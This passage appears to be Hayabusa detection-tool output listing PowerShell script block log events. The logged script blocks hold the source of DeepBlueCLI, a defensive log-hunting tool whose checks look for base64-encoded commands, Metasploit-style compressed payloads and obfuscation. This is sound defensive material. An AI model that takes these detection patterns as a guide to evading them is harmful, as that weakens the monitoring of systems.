Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.130 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.136 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.139 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.428 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.428 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.429 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.430 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.522 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.524 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:48.525 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:49.697 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.700 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.705 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of 
malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.705 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
